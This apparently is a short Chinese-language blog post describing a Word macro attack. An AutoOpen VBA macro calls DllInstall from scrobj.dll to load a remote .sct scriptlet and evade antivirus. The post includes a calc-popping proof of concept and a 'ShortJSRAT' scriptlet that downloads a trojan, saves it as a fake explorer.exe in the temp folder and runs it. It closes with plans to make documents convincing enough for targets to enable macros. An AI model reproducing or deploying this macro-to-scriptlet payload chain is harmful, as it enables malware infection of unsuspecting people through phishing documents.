写在前面
仅仅是为了娱乐。
知识点
- 宏代码,不执行regsvr32命令 远程调用sct文件,实现免杀
- csharp 可执行js ,反序列化加载
具体的原理:
利用宏调用Dlllnstall api
Private Declare PtrSafe Function DllInstall Lib "scrobj.dll" (ByVal bInstall As Boolean, ByRef pszCmdLine As Any) As Long
Sub AutoOpen()
DllInstall False, ByVal StrPtr("ip/y.sct") ' False = "Don't install"
End Sub
后续操作
0x01 远程部署一个sct
例如:弹个计算器
<?XML version="1.0"?>
<scriptlet>
<registration
progid="TESTING"
classid="{A1112221-0000-0000-3000-000DA00DABFC}" >
<script language="JScript">
<![CDATA[
var foo = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</registration>
</scriptlet>
后续只需要使用word宏远程加载这个sct文件就成。
0x02 免杀
操作和前面一样。
<?XML version="1.0"?>
<scriptlet>
<registration
progid="ShortJSRAT"
classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Learn from Casey Smith @subTee -->
<script language="JScript">
<![CDATA[
var WSHShell = new ActiveXObject("WScript.Shell");
path = WSHShell.ExpandEnvironmentStrings("%temp%");
var filepath = path+"/explorer.exe";
var xhr = new ActiveXObject("MSXML2.XMLHTTP");
xhr.open("GET","免杀马", false);
xhr.send();
if (xhr.Status == 200) {
var fso = new ActiveXObject("Scripting.FileSystemObject");
var stream = new ActiveXObject("ADODB.Stream");
stream.Open();
stream.Type = 1;
stream.Write(xhr.ResponseBody);
stream.Position = 0;
if (fso.FileExists(filepath)){
fso.DeleteFile(filepath);
}
stream.SaveToFile(filepath);
stream.Close();
new ActiveXObject("WScript.Shell").Exec(filepath);
}
]]>
</script>
</registration>
</scriptlet>
0x03 对word的一些处理
后续会思考如何才能让目标打开宏,怎么样才能更加逼真
0x04 总结
感谢愿意陪我玩的朋友。
